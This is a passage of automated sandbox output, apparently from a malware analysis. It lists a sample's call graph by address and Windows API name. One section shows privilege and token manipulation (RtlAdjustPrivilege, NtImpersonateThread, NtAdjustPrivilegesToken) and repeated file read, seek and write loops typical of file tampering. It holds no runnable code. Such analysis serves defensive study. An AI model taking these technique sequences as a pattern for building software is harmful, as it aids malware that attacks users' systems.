428b28 __setmode 58 API calls 181610->181613 181614 430df1 181611->181614 181615 430e04 181611->181615 181618 428db6 __setmode 9 API calls 181612->181618 181613->181612 181617 430e5b __read_nolock 70 API calls 181614->181617 181619 428b28 __setmode 58 API calls 181615->181619 181616->181549 181620 430dfd 181617->181620 181618->181616 181621 430e09 181619->181621 181623 430e33 __read LeaveCriticalSection 181620->181623 181622 428af4 __wsopen_nolock 58 API calls 181621->181622 181622->181620 181623->181616 181624->181541 181625->181540 181626->181544 181630 42520a GetSystemTimeAsFileTime 181627->181630 181629 468f6e 181629->181219 181631 425238 __aulldiv 181630->181631 181631->181629 181633 425c6c __setmode 181632->181633 181634 425c93 181633->181634 181635 425c7e 181633->181635 181637 426c11 __lock_file 59 API calls 181634->181637 181646 428b28 58 API calls __getptd_noexit 181635->181646 181639 425c99 181637->181639 181638 425c83 181647 428db6 9 API calls __setmode 181638->181647 181648 4258d0 67 API calls 6 library calls 181639->181648 181642 425ca4 181649 425cc4 LeaveCriticalSection LeaveCriticalSection _fseek 181642->181649 181644 425c8e __setmode 181644->181224 181645 425cb6 181645->181644 181646->181638 181647->181644 181648->181642 181649->181645 181650->181085 181651->181098 181652->181101 181653->181097 181654->181106 181670 469748 __tzset_nolock _wcscmp 181666->181670 181667 469109 GetSystemTimeAsFileTime 181667->181670 181668 404f0b 74 API calls 181668->181670 181669 4695dc 181669->181127 181669->181155 181670->181667 181670->181668 181670->181669 181671 404ee5 85 API calls 181670->181671 181671->181670 181673 468b1f 181672->181673 181674 468b11 181672->181674 181676 468b64 181673->181676 181677 42525b 115 API calls 181673->181677 181702 468b28 181673->181702 181675 42525b 115 API calls 181674->181675 181675->181673 181703 468d91 181676->181703 181678 468b49 181677->181678 181678->181676 181681 468b52 181678->181681 181680 468ba8 181682 468bac 181680->181682 181683 468bcd 181680->181683 181685 4253a6 __fcloseall 83 API calls 181681->181685 181681->181702 181684 468bb9 181682->181684 181687 4253a6 __fcloseall 83 API calls 181682->181687 181707 4689a9 181683->181707 181689 4253a6 __fcloseall 83 API calls 181684->181689 181684->181702 181685->181702 181687->181684 181689->181702 181690 468bfb 181691 468bdb 181702->181156 181704 468db6 181703->181704 181705 468d9f __tzset_nolock _memmove 181703->181705 181706 4255e2 __fread_nolock 74 API calls 181704->181706 181705->181680 181706->181705 181708 42571c __crtLCMapStringA_stat 58 API calls 181707->181708 181709 4689b8 181708->181709 181710 42571c __crtLCMapStringA_stat 58 API calls 181709->181710 181711 4689cc 181710->181711 181712 42571c __crtLCMapStringA_stat 58 API calls 181711->181712 181713 4689e0 181712->181713 181714 468d0d 58 API calls 181713->181714 181715 4689f3 181713->181715 181714->181715 181715->181690 181715->181691 183058 401055 183063 402649 183058->183063 183061 422d40 __cinit 67 API calls 183062 401064 183061->183062 183064 407667 59 API calls 183063->183064 183065 4026b7 183064->183065 183071 403582 183065->183071 183067 43c069 183069 402754 183069->183067 183070 40105a 183069->183070 183074 403416 59 API calls 2 library calls 183069->183074 183070->183061 183075 4035b0 183071->183075 183074->183069 183076 4035bd 183075->183076 183077 4035a1 183075->183077 183076->183077 183078 4035c4 RegOpenKeyExW 183076->183078 183077->183069 183078->183077 183079 4035de RegQueryValueExW 183078->183079 183080 403614 RegCloseKey 183079->183080 183081 4035ff 183079->183081 183080->183077 183081->183080 183082 401016 183087 404974 183082->183087 183085 422d40 __cinit 67 API calls 183086 401025 183085->183086 183088 420db6 Mailbox 59 API calls 183087->183088 183089 40497c 183088->183089 183090 40101b 183089->183090 183094 404936 183089->183094 183090->183085 183095 40493f 183094->183095 183097 404951 183094->183097 183096 422d40 __cinit 67 API calls 183095->183096 183096->183097 183098 4049a0 183097->183098 183099 407667 59 API calls 183098->183099 183100 4049b8 GetVersionExW 183099->183100 183101 407bcc 59 API calls 183100->183101 183102 4049fb 183101->183102 183103 407d2c 59 API calls 183102->183103 183112 404a28 183102->183112 183104 404a1c 183103->183104 183105 407726 59 API calls 183104->183105 183105->183112 183106 404a93 GetCurrentProcess IsWow64Process 183107 404aac 183106->183107 183109 404ac2 183107->183109 183110 404b2b GetSystemInfo 183107->183110 183108 43d864 183122 404b37 183109->183122 183111 404af8 183110->183111 183111->183090 183112->183106 183112->183108 183115 404ad4 183118 404b37 2 API calls 183115->183118 183116 404b1f GetSystemInfo 183117 404ae9 183116->183117 183117->183111 183120 404aef FreeLibrary 183117->183120 183119 404adc GetNativeSystemInfo 183118->183119 183119->183117 183120->183111 183123 404ad0 183122->183123 183124 404b40 LoadLibraryA 183122->183124 183123->183115 183123->183116 183124->183123 183125 404b51 GetProcAddress 183124->183125 183125->183123 183126 2f19e10 183127 2f19c78 183126->183127 183128 2f1a0ee SetFilePointerEx 183127->183128 183129 2f19fa1 183127->183129 183148 2f183f8 183127->183148 183172 2f18760 183127->183172 183146 2f19b82 183128->183146 183130 2f19fc9 183129->183130 183147 2f19aea 183129->183147 183132 2f183b7 183130->183132 183135 2f1909c 183130->183135 183178 2f19d59 183130->183178 183131 2f183d2 183137 2f15bc0 VirtualAlloc 183131->183137 183132->183131 183138 2f18350 183132->183138 183141 2f183a4 183132->183141 183132->183148 183174 2f18340 183132->183174 183133 2f15bc0 VirtualAlloc 183133->183138 183185 2f18359 28 API calls 183135->183185 183136 2f19d94 183140 2f19e9c SetFilePointerEx 183136->183140 183136->183148 183137->183141 183138->183148 183182 2f18390 VirtualAlloc 183138->183182 183139 2f18362 183141->183148 183183 2f219a0 VirtualAlloc 183141->183183 183144 2f186d6 183145 2f15bc0 VirtualAlloc 183144->183145 183145->183148 183146->183132 183146->183136 183146->183147 183146->183148 183150 2f19e6e 183146->183150 183152 2f18e1a 183146->183152 183146->183178 183147->183148 183149 2f162e0 2 API calls 183147->183149 183147->183178 183149->183147 183151 2f19e74 183150->183151 183170 2f18ec5 183150->183170 183153 2f19e86 183151->183153 183151->183178 183152->183148 183154 2f1945e 183152->183154 183158 2f1fd47 183152->183158 183152->183170 183152->183172 183153->183132 183153->183136 183157 2f1e300 3 API calls 183154->183157 183155 2f1883d 183155->183132 183155->183138 183155->183148 183163 2f187d5 183155->183163 183156 2f19799 ReadFile 183156->183170 183156->183172 183157->183170 183159 2f3a895 183158->183159 183186 2f1482b 46 API calls _strlen 183158->183186 183160 2f187f2 183162 2f15bc0 VirtualAlloc 183165 2f187b4 183162->183165 183163->183160 183184 2f18390 VirtualAlloc 183163->183184 183164 2f1a528 GetFileSize 183165->183162 183165->183163 183166 2f1a47e 183168 2f1e8f0 4 API calls 183166->183168 183168->183148 183169 2f1a519 183169->183148 183169->183164 183170->183135 183170->183148 183170->183156 183171 2f195c8 SetFilePointerEx 183170->183171 183170->183172 183170->183174 183170->183178 183171->183170 183172->183131 183172->183132 183172->183141 183172->183148 183172->183155 183172->183165 183173 2f1a6cd 183175 2f162e0 2 API calls 183173->183175 183179 2f1a7f7 183173->183179 183174->183133 183174->183138 183176 2f1a700 183175->183176 183177 2f4f080 22 API calls 183176->183177 183180 2f1a737 183177->183180 183178->183132 183178->183148 183178->183155 183178->183164 183178->183166 183178->183169 183178->183172 183178->183173 183180->183179 183181 2f1e8f0 4 API calls 183180->183181 183181->183179 183182->183139 183183->183144 183184->183163 183185->183148 183186->183148 183187 43fe27 183200 41f944 183187->183200 183189 43fe3d 183190 43fe53 183189->183190 183191 43febe 183189->183191 183209 409e5d 60 API calls 183190->183209 183196 40fce0 341 API calls 183191->183196 183193 43fe92 183194 44089c 183193->183194 183195 43fe9a 183193->183195 183211 469e4a 89 API calls 4 library calls 183194->183211 183210 46834f 59 API calls Mailbox 183195->183210 183199 43feb2 Mailbox 183196->183199 183199->183199 183201 41f950 183200->183201 183202 41f962 183200->183202 183212 409d3c 60 API calls Mailbox 183201->183212 183204 41f991 183202->183204 183205 41f968 183202->183205 183213 409d3c 60 API calls Mailbox 183204->183213 183206 420db6 Mailbox 59 API calls 183205->183206 183208 41f95a 183206->183208 183208->183189 183209->183193 183210->183199 183211->183199 183212->183208 183213->183208 183214 2f1ab15 183215 2f1ab25 183214->183215 183216 2f1aae6 SetFilePointerEx 183214->183216 183215->183216 183217 2f1ab27 183215->183217 183218 401066 183223 40f76f 183218->183223 183220 40106c 183221 422d40 __cinit 67 API calls 183220->183221 183222 401076 183221->183222 183224 40f790 183223->183224 183256 41ff03 183224->183256 183228 40f7d7 183229 407667 59 API calls 183228->183229 183230 40f7e1 183229->183230 183231 407667 59 API calls 183230->183231 183232 40f7eb 183231->183232 183233 407667 59 API calls 183232->183233 183234 40f7f5 183233->183234 183235 407667 59 API calls 183234->183235 183236 40f833 183235->183236 183237 407667 59 API calls 183236->183237 183238 40f8fe 183237->183238 183266 415f87 183238->183266 183242 40f930 183243 407667 59 API calls 183242->183243 183244 40f93a 183243->183244 183294 41fd9e 183244->183294 183246 40f981 183247 40f991 GetStdHandle 183246->183247 183248 40f9dd 183247->183248 183249 4445ab 183247->183249 183250 40f9e5 OleInitialize 183248->183250 183249->183248 183251 4445b4 183249->183251 183250->183220 183301 466b38 64 API calls Mailbox 183251->183301 183253 4445bb 183302 467207 CreateThread 183253->183302 183255 4445c7 CloseHandle 183255->183250 183303 41ffdc 183256->183303 183259 41ffdc 59 API calls 183260 41ff45 183259->183260 183261 407667 59 API calls 183260->183261 183262 41ff51 183261->183262 183263 407bcc 59 API calls 183262->183263 183264 40f796 183263->183264 183265 420162 6 API calls 183264->183265 183265->183228 183267 407667 59 API calls 183266->183267 183268 415f97 183267->183268 183269 407667 59 API calls 183268->183269 183270 415f9f 183269->183270 183310 415a9d 183270->183310 183273 415a9d 59 API calls 183274 415faf 183273->183274 183275 407667 59 API calls 183274->183275 183276 415fba 183275->183276 183277 420db6 Mailbox 59 API calls 183276->183277 183278 40f908 183277->183278 183279 4160f9 183278->183279 183280 416107 183279->183280 183281 407667 59 API calls 183280->183281 183282 416112 183281->183282 183283 407667 59 API calls 183282->183283 183284 41611d 183283->183284 183285 407667 59 API calls 183284->183285 183286 416128 183285->183286 183287 407667 59 API calls 183286->183287 183288 416133 183287->183288 183289 415a9d 59 API calls 183288->183289 183290 41613e 183289->183290 183291 420db6 Mailbox 59 API calls 183290->183291 183292 416145 RegisterWindowMessageW 183291->183292 183292->183242 183295 45576f 183294->183295 183296 41fdae 183294->183296 183313 469ae7 60 API calls 183295->183313 183297 420db6 Mailbox 59 API calls 183296->183297 183300 41fdb6 183297->183300 183299 45577a 183300->183246 183301->183253 183302->183255 183314 4671ed 65 API calls 183302->183314 183304 407667 59 API calls 183303->183304 183305 41ffe7 183304->183305 183306 407667 59 API calls 183305->183306 183307 41ffef 183306->183307 183308 407667 59 API calls 183307->183308 183309 41ff3b 183308->183309 183309->183259 183311 407667 59 API calls 183310->183311 183312 415aa5 183311->183312 183312->183273 183313->183299 183315 411366 183320 41121b 183315->183320 183324 41fe64 183315->183324 183317 4114e9 183330 40cbf0 89 API calls 183317->183330 183319 4115e1 183331 469e4a 89 API calls 4 library calls 183319->183331 183320->183317 183320->183319 183323 411452 183320->183323 183329 40cbf0 89 API calls 183320->183329 183325 41fe74 183324->183325 183326 455783 183324->183326 183327 420db6 Mailbox 59 API calls 183325->183327 183328 41fe7b 183327->183328 183328->183320 183329->183320 183330->183323 183331->183323 183332 2f18318 GetTokenInformation 183347 2f16c96 _strlen 183332->183347 183333 2f181ea CloseHandle 183333->183347 183334 2f1827c GetTokenInformation 183335 2f1828e GetLastError 183334->183335 183334->183347 183335->183347 183336 2f17a25 MultiByteToWideChar 183337 2f17a37 183336->183337 183338 2f1e329 WriteFile 183346 2f1e337 183338->183346 183454 2f1e38d 183338->183454 183339 2f1716d 183340 2f15f1c SetFilePointerEx 183339->183340 183358 2f17023 183339->183358 183341 2f162e0 ReadFile SetFilePointerEx 183438 2f16ec5 183341->183438 183342 2f15da4 183350 2f15df2 ReadFile 183342->183350 183449 2f15c10 _strlen 183342->183449 183343 2f33658 GetFileSizeEx 183344 2f41f67 183490 2f1482b 46 API calls _strlen 183344->183490 183345 2f41c92 RtlAdjustPrivilege 183345->183358 183353 2f162e0 2 API calls 183346->183353 183346->183454 183347->183333 183347->183334 183347->183336 183347->183339 183347->183358 183389 2f15d9e 183347->183389 183347->183438 183445 2f17746 183347->183445 183347->183449 183348 2f32a4d GetEnvironmentVariableW 183354 2f32a58 183348->183354 183355 2f32a9f GetTempPathW 183348->183355 183350->183449 183351 2f1efff 183356 2f1f007 SetFilePointerEx 183351->183356 183435 2f1eead 183351->183435 183352 2f3522a 183361 2f3364a 183352->183361 183369 2f33566 183352->183369 183375 2f346bc 183352->183375 183359 2f33003 183353->183359 183357 2f41f70 183360 2f41f7e RtlExitUserThread 183357->183360 183358->183344 183358->183345 183371 2f41cd1 NtQuerySystemInformation 183358->183371 183358->183449 183362 2f32cbf 183359->183362 183437 2f33012 183359->183437 183368 2f33656 183361->183368 183361->183369 183370 2f162e0 2 API calls 183362->183370 183363 2f32ad0 183366 2f32ad2 wsprintfW 183363->183366 183364 2f32a40 183381 2f32a4c 183364->183381 183412 2f32421 183364->183412 183364->183449 183365 2f33018 183383 2f162e0 2 API calls 183365->183383 183365->183449 183413 2f329c4 183366->183413 183367 2f32b31 183368->183343 183416 2f32bdc 183369->183416 183369->183437 183369->183449 183378 2f32cc8 183370->183378 183427 2f41ce8 183371->183427 183372 2f20a10 46 API calls 183431 2f3296b _wcslen 183372->183431 183373 2f32c72 183386 2f162e0 2 API calls 183373->183386 183374 2f34bb4 GetTickCount 183382 2f162e0 2 API calls 183374->183382 183376 2f162e0 2 API calls 183375->183376 183387 2f3fc86 183375->183387 183385 2f3f9fa 183376->183385 183377 2f34341 183380 2f34909 183377->183380 183396 2f162e0 2 API calls 183377->183396 183379 2f41cfc RtlInitUnicodeString 183388 2f41d40 RtlEqualUnicodeString 183379->183388 183381->183348 183399 2f33ee3 183382->183399 183390 2f3329e 183383->183390 183384 2f34536 CloseHandle 183384->183438 183395 2f32c7b 183386->183395 183388->183427 183389->183342 183393 2f15f4a 183389->183393 183389->183449 183392 2f345b6 183405 2f162e0 2 API calls 183392->183405 183393->183340 183393->183449 183394 2f346a3 183394->183375 183394->183392 183400 2f34353 183396->183400 183397 2f32abb 183398 2f32de7 183406 2f162e0 2 API calls 183398->183406 183399->183384 183401 2f34bd9 183399->183401 183407 2f344b4 CreateFileW 183399->183407 183399->183438 183402 2f1e6c3 183408 2f1e6c4 ReadFile 183402->183408 183403 2f32b8f 183403->183412 183403->183413 183403->183449 183404 2f32b76 183404->183366 183404->183403 183404->183412 183404->183416 183409 2f34927 183405->183409 183410 2f32ded 183406->183410 183407->183399 183407->183438 183408->183454 183414 2f162e0 2 API calls 183409->183414 183410->183346 183419 2f32dff 183410->183419 183411 2f41d90 NtOpenThread 183415 2f41df5 NtImpersonateThread 183411->183415 183411->183427 183412->183449 183455 2f32c20 183412->183455 183413->183367 183489 2f1482b 46 API calls _strlen 183413->183489 183421 2f34938 183414->183421 183422 2f41e24 NtOpenThreadTokenEx 183415->183422 183415->183427 183417 2f3331c 183416->183417 183423 2f32cff 183416->183423 183447 2f32c81 183416->183447 183417->183413 183425 2f334b7 183417->183425 183434 2f3332e 183417->183434 183426 2f162e0 2 API calls 183419->183426 183420 2f33169 GetTickCount 183424 2f33168 183420->183424 183420->183447 183422->183427 183429 2f162e0 2 API calls 183423->183429 183424->183420 183424->183447 183432 2f32e05 183426->183432 183427->183358 183427->183379 183427->183388 183427->183411 183428 2f41ed9 NtClose 183427->183428 183433 2f41ee7 NtClose 183427->183433 183442 2f41e4e NtAdjustPrivilegesToken 183427->183442 183428->183427 183429->183447 183430 2f3345d 183436 2f162e0 2 API calls 183430->183436 183431->183348 183431->183351 183431->183355 183431->183363 183431->183364 183431->183372 183431->183404 183431->183413 183441 2f329db 183431->183441 183431->183447 183431->183449 183433->183427 183434->183348 183434->183447 183443 2f1e381 183435->183443 183435->183445 183453 2f1e935 183435->183453 183435->183454 183439 2f33463 183436->183439 183437->183365 183437->183373 183437->183449 183438->183341 183438->183343 183438->183352 183438->183365 183438->183374 183438->183377 183438->183392 183438->183394 183438->183398 183438->183399 183438->183407 183438->183412 183438->183413 183438->183431 183438->183437 183438->183447 183438->183449 183440 2f162e0 ReadFile SetFilePointerEx 183440->183447 183441->183412 183441->183413 183446 2f329f4 183441->183446 183441->183454 183442->183427 183442->183428 183443->183402 183443->183408 183443->183445 183443->183454 183444 2f1f2f0 WriteFile 183444->183454 183445->183338 183445->183454 183446->183375 183446->183413 183447->183373 183447->183412 183447->183419 183447->183420 183447->183424 183447->183430 183447->183440 183448 2f32ed5 183447->183448 183447->183449 183450 2f162e0 2 API calls 183448->183450 183452 2f32edb 183450->183452 183453->183346 183453->183444 183453->183445 183453->183454 183456 2f32c26 183455->183456 183483 2f32c81 183455->183483 183457 2f3331c 183456->183457 183459 2f32cff 183456->183459 183456->183483 183458 2f334b7 183457->183458 183463 2f3332e 183457->183463 183471 2f329fc 183457->183471 183458->183449 183460 2f162e0 2 API calls 183459->183460 183460->183483 183461 2f33168 183464 2f33169 GetTickCount 183461->183464 183461->183483 183462 2f162e0 ReadFile SetFilePointerEx 183462->183483 183466 2f32a4d GetEnvironmentVariableW 183463->183466 183463->183483 183464->183461 183464->183483 183465 2f32b31 183465->183449 183467 2f32a58 183466->183467 183468 2f32a9f GetTempPathW 183466->183468 183467->183449 183468->183449 183469 2f32ed5 183470 2f162e0 2 API calls 183469->183470 183473 2f32edb 183470->183473 183471->183465 183491 2f1482b 46 API calls _strlen 183471->183491 183472 2f3345d 183474 2f162e0 2 API calls 183472->183474 183473->183449 183475 2f33463 183474->183475 183475->183449 183477 2f32abb 183477->183449 183478 2f32e01 183479 2f162e0 2 API calls 183478->183479 183480 2f32e05 183479->183480 183480->183449 183481 2f325aa 183482 2f32637 183481->183482 183484 2f32c20 48 API calls 183481->183484 183482->183449 183483->183449 183483->183461 183483->183462 183483->183464 183483->183469 183483->183472 183483->183478 183483->183481 183483->183482 183485 2f32c72 183483->183485 183487 2f325c0 183484->183487 183486 2f162e0 2 API calls 183485->183486 183488 2f32c7b 183486->183488 183487->183449 183488->183449 183489->183397 183490->183357 183491->183477 183492 40552a 183499 405ab8 183492->183499 183498 40555a Mailbox 183500 420db6 Mailbox 59 API calls 183499->183500 183501 405acb 183500->183501 183502 420db6 Mailbox 59 API calls 183501->183502 183503 40553c 183502->183503 183504 4054d2 183503->183504 183518 4058cf 183504->183518 183506 405514 183506->183498 183510 408061 MultiByteToWideChar 183506->183510 183507 405bc0 2 API calls 183508 4054e3 183507->183508 183508->183506 183508->183507 183525 405a7a 183508->183525 183511 408087 183510->183511 183512 4080ce 183510->183512 183514 420db6 Mailbox 59 API calls 183511->183514 183513 407d8c 59 API calls 183512->183513 183517 4080c0 183513->183517 183515 40809c MultiByteToWideChar 183514->183515 183541 40774d 59 API calls 2 library calls 183515->183541 183517->183498 183519 4058e0 183518->183519 183520 43dc3c 183518->183520 183519->183508 183534 455ecd 59 API calls Mailbox 183520->183534 183522 43dc46 183523 420db6 Mailbox 59 API calls 183522->183523 183524 43dc52 183523->183524 183526 43dcee 183525->183526 183527 405a8e 183525->183527 183540 455ecd 59 API calls Mailbox 183526->183540 183535 4059b9 183527->183535 183530 43dcf9 183532 420db6 Mailbox 59 API calls 183530->183532 183531 405a9a 183531->183508 183533 43dd0e _memmove 183532->183533 183534->183522 183536 4059d1 183535->183536 183539 4059ca _memmove 183535->183539 183537 420db6 Mailbox 59 API calls 183536->183537 183538 43dc7e 183536->183538 183537->183539 183539->183531 183540->183530 183541->183517 183542 40e5ab 183545 40d100 183542->183545 183544 40e5b9 183546 40d11d 183545->183546 183574 40d37d 183545->183574 183547 4426e0 183546->183547 183548 442691 183546->183548 183577 40d144 183546->183577 183589 47a3e6 341 API calls __cinit 183547->183589 183551 442694 183548->183551 183556 4426af 183548->183556 183552 4426a0 183551->183552 183551->183577 183587 47a9fa 341 API calls 183552->183587 183553 422d40 __cinit 67 API calls 183553->183577 183556->183574 183588 47aea2 341 API calls 3 library calls 183556->183588 183557 40d434 183581 408a52 68 API calls 183557->183581 183558 4428b5 183558->183558 183559 40d54b 183559->183544 183563 40d443 183563->183544 183564 4427fc 183593 47a751 89 API calls 183564->183593 183567 4084c0 69 API calls 183567->183577 183574->183559 183594 469e4a 89 API calls 4 library calls 183574->183594 183575 409ea0 341 API calls 183575->183577 183576 408047 59 API calls 183576->183577 183577->183553 183577->183557 183577->183559 183577->183564 183577->183567 183577->183574 183577->183575 183577->183576 183579 408740 68 API calls __cinit 183577->183579 183580 408542 68 API calls 183577->183580 183582 40843a 68 API calls 183577->183582 183583 40cf7c 341 API calls 183577->183583 183584 409dda 59 API calls Mailbox 183577->183584 183585 40cf00 89 API calls 183577->183585 183586 40cd7d 341 API calls 183577->183586 183590 408a52 68 API calls 183577->183590 183591 409d3c 60 API calls Mailbox 183577->183591 183592 45678d 60 API calls 183577->183592 183579->183577 183580->183577 183581->183563 183582->183577 183583->183577 183584->183577 183585->183577 183586->183577 183587->183559 183588->183574 183589->183577 183590->183577 183591->183577 183592->183577 183593->183574 183594->183558 183595 2f1b5c0 183631 2f1b091 183595->183631 183596 2f1b5bc SetFilePointerEx 183596->183631 183597 2f1b118 183603 2f18350 183597->183603 183609 2f18476 183597->183609 183617 2f19aea 183597->183617 183621 2f18760 183597->183621 183627 2f1b22e 183597->183627 183640 2f18ec5 183597->183640 183598 2f1b339 SetFilePointerEx 183599 2f1b349 183598->183599 183608 2f1b27e 183598->183608 183601 2f18340 183602 2f15bc0 VirtualAlloc 183601->183602 183601->183603 183602->183603 183603->183609 183647 2f18390 VirtualAlloc 183603->183647 183604 2f183b7 183604->183601 183604->183603 183604->183609 183611 2f183d2 183604->183611 183622 2f183a4 183604->183622 183606 2f195c8 SetFilePointerEx 183606->183640 183607 2f162e0 2 API calls 183607->183617 183608->183609 183651 2f1482b 46 API calls _strlen 183608->183651 183613 2f15bc0 VirtualAlloc 183611->183613 183612 2f18362 183613->183622 183614 2f19799 ReadFile 183614->183621 183614->183640 183616 2f186d6 183618 2f15bc0 VirtualAlloc 183616->183618 183617->183607 183617->183609 183638 2f19d59 183617->183638 183618->183609 183619 2f1b09f ReadFile 183619->183609 183620 2f15bc0 VirtualAlloc 183623 2f187b4 183620->183623 183621->183604 183621->183609 183621->183611 183621->183622 183621->183623 183622->183609 183648 2f219a0 VirtualAlloc 183622->183648 183623->183620 183624 2f187d5 183623->183624 183626 2f187f2 183624->183626 183649 2f18390 VirtualAlloc 183624->183649 183627->183621 183628 2f1909c 183627->183628 183650 2f18359 28 API calls 183628->183650 183629 2f1a528 GetFileSize 183630 2f1a519 183630->183609 183630->183629 183631->183596 183631->183597 183631->183598 183631->183604 183631->183608 183631->183609 183631->183617 183631->183619 183631->183621 183631->183628 183631->183630 183634 2f18e3f 183631->183634 183631->183638 183631->183640 183632 2f1a47e 183633 2f1e8f0 4 API calls 183632->183633 183633->183609 183634->183608 183634->183609 183634->183621 183635 2f1945e 183634->183635 183637 2f1e300 3 API calls 183635->183637 183636 2f1883d 183636->183603 183636->183604 183636->183609 183636->183624 183637->183640 183638->183604 183638->183609 183638->183621 183638->183629 183638->183630 183638->183632 183638->183636 183639 2f1a6cd 183638->183639 183641 2f162e0 2 API calls 183639->183641 183644 2f1a7f7 183639->183644 183640->183601 183640->183606 183640->183609 183640->183614 183640->183621 183640->183628 183640->183638 183642 2f1a700 183641->183642 183643 2f4f080 22 API calls 183642->183643 183645 2f1a737 183643->183645 183645->183644 183646 2f1e8f0 4 API calls 183645->183646 183646->183644 183647->183612 183648->183616 183649->183624 183650->183609 183651->183609 183652 403633 183653 40366a 183652->183653 183654 4036e5 183653->183654 183655 4036e7 183653->183655 183656 403688 183653->183656 183657 4036ca DefWindowProcW 183654->183657 183658 4036ed 183655->183658 183659 43d0cc 183655->183659 183660 403695 183656->183660 183661 40374b PostQuitMessage 183656->183661 183662 4036d8 183657->183662 183663 4036f2 183658->183663 183664 403715 SetTimer RegisterWindowMessageW 183658->183664 183701 411070 10 API calls Mailbox 183659->183701 183666 4036a0 183660->183666 183667 43d154 183660->183667 183661->183662 183672 4036f9 KillTimer 183663->183672 183673 43d06f 183663->183673 183664->183662 183668 40373e CreatePopupMenu 183664->183668 183669 403755 183666->183669 183670 4036a8 183666->183670 183706 462527 71 API calls _memset 183667->183706 183668->183662 183699 4044a0 64 API calls _memset 183669->183699 183676 4036b3 183670->183676 183677 43d139 183670->183677 183697 40443a Shell_NotifyIconW _memset 183672->183697 183680 43d074 183673->183680 183681 43d0a8 MoveWindow 183673->183681 183674 43d0f3 183702 411093 341 API calls Mailbox 183674->183702 183683 4036be 183676->183683 183684 43d124 183676->183684 183677->183657 183705 457c36 59 API calls Mailbox 183677->183705 183678 43d166 183678->183657 183678->183662 183686 43d097 SetFocus 183680->183686 183687 43d078 183680->183687 183681->183662 183683->183657 183703 40443a Shell_NotifyIconW _memset 183683->183703 183704 462d36 81 API calls _memset 183684->183704 183685 403764 183685->183662 183686->183662 183687->183683 183689 43d081 183687->183689 183688 40370c 183698 403114 DeleteObject DestroyWindow Mailbox 183688->183698 183700 411070 10 API calls Mailbox 183689->183700 183695 43d118 183696 40434a 68 API calls 183695->183696 183696->183654 183697->183688 183698->183662 183699->183685 183700->183662 183701->183674 183702->183683 183703->183695 183704->183685 183705->183654 183706->183678 183707 ac1698 183721 abf2e8 183707->183721 183709 ac1753 183724 ac1588 183709->183724 183727 ac2778 GetPEB 183721->183727 183723 abf973 183723->183709 183725 ac1591 Sleep 183724->183725 183726 ac159f 183725->183726 183728 ac27a2 183727->183728 183728->183723 183729 2f1ad84 183730 2f1ab66 183729->183730 183731 2f1ad95 SetFilePointerEx 183730->183731 183733 2f1ad30 183730->183733 183735 2f1acd1 WriteFile 183730->183735 183734 2f1ada4 183731->183734 183734->183734 183735->183730 183736 401078 183741 40708b 183736->183741 183738 40108c 183739 422d40 __cinit 67 API calls 183738->183739 183740 401096 183739->183740 183742 40709b __write_nolock 183741->183742 183743 407667 59 API calls 183742->183743 183744 407151 183743->183744 183745 404706 61 API calls 183744->183745 183746 40715a 183745->183746 183772 42050b 183746->183772 183749 407cab 59 API calls 183750 407173 183749->183750 183751 403f74 59 API calls 183750->183751 183752 407182 183751->183752 183753 407667 59 API calls 183752->183753 183754 40718b 183753->183754 183755 407d8c 59 API calls 183754->183755 183756 407194 RegOpenKeyExW 183755->183756 183757 43e8b1 RegQueryValueExW 183756->183757 183762 4071b6 Mailbox 183756->183762 183758 43e943 RegCloseKey 183757->183758 183759 43e8ce 183757->183759 183758->183762 183770 43e955 _wcscat Mailbox __NMSG_WRITE 183758->183770 183760 420db6 Mailbox 59 API calls 183759->183760 183761 43e8e7 183760->183761 183763 40522e 59 API calls 183761->183763 183762->183738 183764 43e8f2 RegQueryValueExW 183763->183764 183765 43e90f 183764->183765 183768 43e929 183764->183768 183767 407bcc 59 API calls 183765->183767 183766 4079f2 59 API calls 183766->183770 183767->183768 183768->183758 183769 407de1 59 API calls 183769->183770 183770->183762 183770->183766 183770->183769 183771 403f74 59 API calls 183770->183771 183771->183770 183773 431940 __write_nolock 183772->183773 183774 420518 GetFullPathNameW 183773->183774 183775 42053a 183774->183775 183776 407bcc 59 API calls 183775->183776 183777 407165 183776->183777 183777->183749 183778 2f1b108 WriteFile 183779 2f1b111 183778->183779 183780 2f191bc 183778->183780 183779->183780 183781 2f1ad99 SetFilePointerEx 183779->183781 183782 2f1ada4 183781->183782 183782->183782 183783 2f1bc0c 183785 2f1b751 183783->183785 183784 2f1bc1f 183785->183784 183786 2f1bae4 SetFilePointerEx 183785->183786 183787 2f1bab7 183786->183787 183788 43fdfc 183791 40ab30 Mailbox _memmove 183788->183791 183790 45617e Mailbox 59 API calls 183805 40a057 183790->183805 183794 40b525 183791->183794 183791->183805 183808 409f37 Mailbox 183791->183808 183815 407de1 59 API calls 183791->183815 183818 47bc6b 341 API calls 183791->183818 183821 40b2b6 183791->183821 183822 409ea0 341 API calls 183791->183822 183824 44086a 183791->183824 183826 440878 183791->183826 183828 44085c 183791->183828 183829 40b21c 183791->183829 183831 420db6 59 API calls Mailbox 183791->183831 183833 456e8f 59 API calls 183791->183833 183840 47445a 341 API calls 183791->183840 183841 468715 183791->183841 183845 47df23 183791->183845 183848 411fc3 183791->183848 183888 482141 183791->183888 183926 46d07b 183791->183926 183973 47c2e0 183791->183973 184005 467956 183791->184005 184011 45617e 183791->184011 184016 409c90 59 API calls Mailbox 183791->184016 184020 47c193 85 API calls 2 library calls 183791->184020 184022 469e4a 89 API calls 4 library calls 183794->184022 183796 40b47a 183797 4409e5 183796->183797 183798 440055 183796->183798 184027 469e4a 89 API calls 4 library calls 183797->184027 184021 469e4a 89 API calls 4 library calls 183798->184021 183799 420db6 59 API calls Mailbox 183799->183808 183801 40b475 183807 408047 59 API calls 183801->183807 183804 440064 183807->183805 183808->183796 183808->183798 183808->183799 183808->183801 183808->183805 183811 407667 59 API calls 183808->183811 183812 408047 59 API calls 183808->183812 183813 422d40 67 API calls __cinit 183808->183813 183814 456e8f 59 API calls 183808->183814 183816 4409d6 183808->183816 183819 40a55a 183808->183819 184014 40c8c0 341 API calls 2 library calls 183808->184014 184015 40b900 60 API calls Mailbox 183808->184015 183811->183808 183812->183808 183813->183808 183814->183808 183815->183791 184026 469e4a 89 API calls 4 library calls 183816->184026 183818->183791 184025 469e4a 89 API calls 4 library calls 183819->184025 184019 40f6a3 341 API calls 183821->184019 183822->183791 184023 409c90 59 API calls Mailbox 183824->184023 184024 469e4a 89 API calls 4 library calls 183826->184024 183828->183790 183828->183805 184017 409d3c 60 API calls Mailbox 183829->184017 183831->183791 183832 40b22d 184018 409d3c 60 API calls Mailbox 183832->184018 183833->183791 183840->183791 